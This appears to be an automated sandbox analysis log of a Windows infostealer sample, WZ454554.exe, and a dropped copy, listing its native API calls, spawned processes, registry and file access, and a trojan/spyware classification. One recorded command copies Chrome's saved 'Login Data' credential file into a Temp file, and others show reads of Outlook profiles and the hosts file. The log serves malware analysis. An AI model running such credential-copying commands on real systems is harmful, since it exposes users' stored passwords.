                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00B710029_2_00B71002
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AD99BF9_2_00AD99BF
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AD41209_2_00AD4120
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00ABF9009_2_00ABF900
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00B822AE9_2_00B822AE
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00B6FA2B9_2_00B6FA2B
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AEEBB09_2_00AEEBB0
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00B7DBD29_2_00B7DBD2
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00B703DA9_2_00B703DA
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_0040103017_2_00401030
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_0041E08017_2_0041E080
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_0041D97617_2_0041D976
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_0040120817_2_00401208
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_0041DAA017_2_0041DAA0
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_0041EB1E17_2_0041EB1E
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_0041ED4D17_2_0041ED4D
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_0041E52217_2_0041E522
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_0041D58317_2_0041D583
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00402D8B17_2_00402D8B
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00402D9017_2_00402D90
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00409E5B17_2_00409E5B
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00409E6017_2_00409E60
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_0041EF4917_2_0041EF49
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_0041E71D17_2_0041E71D
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_0041E79917_2_0041E799
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00402FB017_2_00402FB0
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A920A017_2_00A920A0
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B320A817_2_00B320A8
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A7B09017_2_00A7B090
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B328EC17_2_00B328EC
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B3E82417_2_00B3E824
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B2100217_2_00B21002
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A8412017_2_00A84120
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A6F90017_2_00A6F900
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B322AE17_2_00B322AE
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B1FA2B17_2_00B1FA2B
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A9EBB017_2_00A9EBB0
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B2DBD217_2_00B2DBD2
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B203DA17_2_00B203DA
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B32B2817_2_00B32B28
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A8AB4017_2_00A8AB40
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A7841F17_2_00A7841F
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B2D46617_2_00B2D466
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A9258117_2_00A92581
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A7D5E017_2_00A7D5E0
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B325DD17_2_00B325DD
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A60D2017_2_00A60D20
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B32D0717_2_00B32D07
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B31D5517_2_00B31D55
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B32EF717_2_00B32EF7
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A86E3017_2_00A86E30
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B2D61617_2_00B2D616
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B31FF117_2_00B31FF1
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B3DFCE17_2_00B3DFCE
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: String function: 00ABB150 appears 40 times
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: String function: 00A6B150 appears 48 times
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_0041A330 NtCreateFile,9_2_0041A330
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_0041A3E0 NtReadFile,9_2_0041A3E0
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_0041A460 NtClose,9_2_0041A460
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_0041A510 NtAllocateVirtualMemory,9_2_0041A510
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_0041A3DB NtReadFile,9_2_0041A3DB
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_0041A387 NtReadFile,9_2_0041A387
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_0041A45A NtClose,9_2_0041A45A
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_0041A50B NtAllocateVirtualMemory,9_2_0041A50B
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AF98F0 NtReadVirtualMemory,LdrInitializeThunk,9_2_00AF98F0
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AF9860 NtQuerySystemInformation,LdrInitializeThunk,9_2_00AF9860
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AF9840 NtDelayExecution,LdrInitializeThunk,9_2_00AF9840
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AF99A0 NtCreateSection,LdrInitializeThunk,9_2_00AF99A0
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AF9910 NtAdjustPrivilegesToken,LdrInitializeThunk,9_2_00AF9910
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AF9A20 NtResumeThread,LdrInitializeThunk,9_2_00AF9A20
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AF9A00 NtProtectVirtualMemory,LdrInitializeThunk,9_2_00AF9A00
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AF9A50 NtCreateFile,LdrInitializeThunk,9_2_00AF9A50
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AF95D0 NtClose,LdrInitializeThunk,9_2_00AF95D0
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AF9540 NtReadFile,LdrInitializeThunk,9_2_00AF9540
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AF96E0 NtFreeVirtualMemory,LdrInitializeThunk,9_2_00AF96E0
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AF9660 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_00AF9660
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AF97A0 NtUnmapViewOfSection,LdrInitializeThunk,9_2_00AF97A0
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AF9780 NtMapViewOfSection,LdrInitializeThunk,9_2_00AF9780
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AF9710 NtQueryInformationToken,LdrInitializeThunk,9_2_00AF9710
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AF98A0 NtWriteVirtualMemory,9_2_00AF98A0
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AF9820 NtEnumerateKey,9_2_00AF9820
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AFB040 NtSuspendThread,9_2_00AFB040
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AF99D0 NtCreateProcessEx,9_2_00AF99D0
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AF9950 NtQueueApcThread,9_2_00AF9950
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AF9A80 NtOpenDirectoryObject,9_2_00AF9A80
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AF9A10 NtQuerySection,9_2_00AF9A10
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AFA3B0 NtGetContextThread,9_2_00AFA3B0
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_0041A330 NtCreateFile,17_2_0041A330
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_0041A3E0 NtReadFile,17_2_0041A3E0
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_0041A460 NtClose,17_2_0041A460
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_0041A510 NtAllocateVirtualMemory,17_2_0041A510
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_0041A3DB NtReadFile,17_2_0041A3DB
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_0041A387 NtReadFile,17_2_0041A387
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_0041A45A NtClose,17_2_0041A45A
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_0041A50B NtAllocateVirtualMemory,17_2_0041A50B
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AA98F0 NtReadVirtualMemory,LdrInitializeThunk,17_2_00AA98F0
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AA9860 NtQuerySystemInformation,LdrInitializeThunk,17_2_00AA9860
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AA9840 NtDelayExecution,LdrInitializeThunk,17_2_00AA9840
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AA99A0 NtCreateSection,LdrInitializeThunk,17_2_00AA99A0
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AA9910 NtAdjustPrivilegesToken,LdrInitializeThunk,17_2_00AA9910
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AA9A20 NtResumeThread,LdrInitializeThunk,17_2_00AA9A20
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AA9A00 NtProtectVirtualMemory,LdrInitializeThunk,17_2_00AA9A00
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AA9A50 NtCreateFile,LdrInitializeThunk,17_2_00AA9A50
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AA95D0 NtClose,LdrInitializeThunk,17_2_00AA95D0
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AA9540 NtReadFile,LdrInitializeThunk,17_2_00AA9540
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AA96E0 NtFreeVirtualMemory,LdrInitializeThunk,17_2_00AA96E0
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AA9660 NtAllocateVirtualMemory,LdrInitializeThunk,17_2_00AA9660
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AA97A0 NtUnmapViewOfSection,LdrInitializeThunk,17_2_00AA97A0
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AA9780 NtMapViewOfSection,LdrInitializeThunk,17_2_00AA9780
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AA9710 NtQueryInformationToken,LdrInitializeThunk,17_2_00AA9710
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AA98A0 NtWriteVirtualMemory,17_2_00AA98A0
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AA9820 NtEnumerateKey,17_2_00AA9820
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AAB040 NtSuspendThread,17_2_00AAB040
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AA99D0 NtCreateProcessEx,17_2_00AA99D0
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AA9950 NtQueueApcThread,17_2_00AA9950
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AA9A80 NtOpenDirectoryObject,17_2_00AA9A80
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AA9A10 NtQuerySection,17_2_00AA9A10
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AAA3B0 NtGetContextThread,17_2_00AAA3B0
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AA9B00 NtSetValueKey,17_2_00AA9B00
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AA95F0 NtQueryInformationFile,17_2_00AA95F0
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AA9520 NtWaitForSingleObject,17_2_00AA9520
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AAAD30 NtSetContextThread,17_2_00AAAD30
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AA9560 NtWriteFile,17_2_00AA9560
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AA96D0 NtCreateKey,17_2_00AA96D0
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AA9610 NtEnumerateValueKey,17_2_00AA9610
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AA9670 NtQueryInformationProcess,17_2_00AA9670
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AA9650 NtQueryValueKey,17_2_00AA9650
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AA9FE0 NtCreateMutant,17_2_00AA9FE0
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AA9730 NtQueryVirtualMemory,17_2_00AA9730
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AAA710 NtOpenProcessToken,17_2_00AAA710
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AA9760 NtOpenProcess,17_2_00AA9760
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AA9770 NtSetInformationFile,17_2_00AA9770
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AAA770 NtOpenThread,17_2_00AAA770
                Source: WZ454554.exeBinary or memory string: OriginalFilename vs WZ454554.exe
                Source: WZ454554.exe, 00000002.00000003.285784160.000000000362C000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamePlayMaS EFx.CPL\: vs WZ454554.exe
                Source: WZ454554.exe, 00000002.00000000.283086570.0000000000498000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamePlayMaS EFx.CPL\: vs WZ454554.exe
                Source: WZ454554.exe, 00000002.00000003.283955889.0000000003690000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamePlayMaS EFx.CPL\: vs WZ454554.exe
                Source: WZ454554.exe, 00000009.00000000.322831232.0000000000498000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamePlayMaS EFx.CPL\: vs WZ454554.exe
                Source: WZ454554.exe, 00000009.00000002.410637371.0000000000D3F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs WZ454554.exe
                Source: WZ454554.exe, 00000009.00000002.414071271.0000000002A54000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameHelp.Exej% vs WZ454554.exe
                Source: WZ454554.exe, 00000009.00000002.408113212.0000000000659000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameHelp.Exej% vs WZ454554.exe
                Source: WZ454554.exe, 00000009.00000002.408188246.0000000000667000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameHelp.Exej% vs WZ454554.exe
                Source: WZ454554.exe, 00000009.00000002.409087872.0000000000BAF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs WZ454554.exe
                Source: WZ454554.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                Source: WZ454554.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: WZ454554.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: WZ454554.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: Hyrzbcwcas.exe.2.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                Source: Hyrzbcwcas.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: Hyrzbcwcas.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: Hyrzbcwcas.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: C:\Users\user\Desktop\WZ454554.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\Desktop\WZ454554.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Users\user\Desktop\WZ454554.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Users\user\Desktop\WZ454554.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Users\user\Desktop\WZ454554.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeSection loaded: mpclient.dllJump to behavior
                Source: WZ454554.exeVirustotal: Detection: 22%
                Source: WZ454554.exeReversingLabs: Detection: 39%
                Source: C:\Users\user\Desktop\WZ454554.exeFile read: C:\Users\user\Desktop\WZ454554.exeJump to behavior
                Source: C:\Users\user\Desktop\WZ454554.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\WZ454554.exe "C:\Users\user\Desktop\WZ454554.exe"
                Source: C:\Users\user\Desktop\WZ454554.exeProcess created: C:\Users\user\Desktop\WZ454554.exe C:\Users\user\Desktop\WZ454554.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\Contacts\Hyrzbcwcas.exe "C:\Users\user\Contacts\Hyrzbcwcas.exe"
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\Contacts\Hyrzbcwcas.exe "C:\Users\user\Contacts\Hyrzbcwcas.exe"
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeProcess created: C:\Users\user\Contacts\Hyrzbcwcas.exe C:\Users\user\Contacts\Hyrzbcwcas.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeProcess created: C:\Users\user\Contacts\Hyrzbcwcas.exe C:\Users\user\Contacts\Hyrzbcwcas.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
                Source: C:\Users\user\Desktop\WZ454554.exeProcess created: C:\Users\user\Desktop\WZ454554.exe C:\Users\user\Desktop\WZ454554.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\Contacts\Hyrzbcwcas.exe "C:\Users\user\Contacts\Hyrzbcwcas.exe" Jump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeProcess created: C:\Users\user\Contacts\Hyrzbcwcas.exe C:\Users\user\Contacts\Hyrzbcwcas.exeJump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeProcess created: C:\Users\user\Contacts\Hyrzbcwcas.exe C:\Users\user\Contacts\Hyrzbcwcas.exeJump to behavior
                Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /VJump to behavior
                Source: C:\Users\user\Desktop\WZ454554.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: C:\Users\user\Desktop\WZ454554.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\Hyrzbcwcasllzbwmlqsydewtjitxnzf[1]Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\DB1Jump to behavior
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@16/11@7/3
                Source: C:\Windows\explorer.exeFile read: C:\Users\user\AppData\Roaming\75A8527W\75Alogri.iniJump to behavior
                Source: C:\Users\user\Desktop\WZ454554.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                Source: C:\Users\user\Desktop\WZ454554.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                Source: C:\Users\user\Desktop\WZ454554.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5848:120:WilError_01
                Source: C:\Windows\SysWOW64\help.exeFile written: C:\Users\user\AppData\Roaming\75A8527W\75Alogri.iniJump to behavior
                Source: C:\Users\user\Desktop\WZ454554.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\WZ454554.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\help.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: Binary string: wntdll.pdbUGP source: WZ454554.exe, 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, WZ454554.exe, 00000009.00000002.409087872.0000000000BAF000.00000040.00000001.sdmp, Hyrzbcwcas.exe, 00000011.00000002.429687044.0000000000B5F000.00000040.00000001.sdmp, Hyrzbcwcas.exe, 00000011.00000002.429448664.0000000000A40000.00000040.00000001.sdmp, help.exe, 00000014.00000002.559731759.00000000031E0000.00000040.00000001.sdmp, help.exe, 00000014.00000002.560116485.00000000032FF000.00000040.00000001.sdmp, Hyrzbcwcas.exe, 00000015.00000002.437079630.0000000000980000.00000040.00000001.sdmp, Hyrzbcwcas.exe, 00000015.00000003.420862619.00000000007E0000.00000004.00000001.sdmp, Hyrzbcwcas.exe, 00000015.00000002.437691847.0000000000A9F000.00000040.00000001.sdmp, cmd.exe, 00000019.00000002.431480106.00000000037E0000.00000040.00000001.sdmp, cmd.exe, 00000019.00000002.433718675.00000000038FF000.00000040.00000001.sdmp, help.exe, 0000001C.00000002.437536905.00000000033C0000.00000040.00000001.sdmp, help.exe, 0000001C.00000002.437717560.00000000034DF000.00000040.00000001.sdmp
                Source: Binary string: cmd.pdbUGP source: Hyrzbcwcas.exe, 00000011.00000002.432784499.0000000000DD0000.00000040.00020000.sdmp, cmd.exe, 00000019.00000000.427671130.0000000000D80000.00000040.00020000.sdmp, cmd.exe, 00000019.00000002.430750073.0000000000D80000.00000040.00020000.sdmp
                Source: Binary string: wntdll.pdb source: WZ454554.exe, WZ454554.exe, 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, WZ454554.exe, 00000009.00000002.409087872.0000000000BAF000.00000040.00000001.sdmp, Hyrzbcwcas.exe, Hyrzbcwcas.exe, 00000011.00000002.429687044.0000000000B5F000.00000040.00000001.sdmp, Hyrzbcwcas.exe, 00000011.00000002.429448664.0000000000A40000.00000040.00000001.sdmp, help.exe, 00000014.00000002.559731759.00000000031E0000.00000040.00000001.sdmp, help.exe, 00000014.00000002.560116485.00000000032FF000.00000040.00000001.sdmp, Hyrzbcwcas.exe, 00000015.00000002.437079630.0000000000980000.00000040.00000001.sdmp, Hyrzbcwcas.exe, 00000015.00000003.420862619.00000000007E0000.00000004.00000001.sdmp, Hyrzbcwcas.exe, 00000015.00000002.437691847.0000000000A9F000.00000040.00000001.sdmp, cmd.exe, 00000019.00000002.431480106.00000000037E0000.00000040.00000001.sdmp, cmd.exe, 00000019.00000002.433718675.00000000038FF000.00000040.00000001.sdmp, help.exe, 0000001C.00000002.437536905.00000000033C0000.00000040.00000001.sdmp, help.exe, 0000001C.00000002.437717560.00000000034DF000.00000040.00000001.sdmp
                Source: Binary string: help.pdbGCTL source: WZ454554.exe, 00000009.00000002.408113212.0000000000659000.00000004.00000020.sdmp, WZ454554.exe, 00000009.00000002.413836751.0000000002A50000.00000040.00020000.sdmp, Hyrzbcwcas.exe, 00000015.00000002.437020676.0000000000950000.00000040.00020000.sdmp
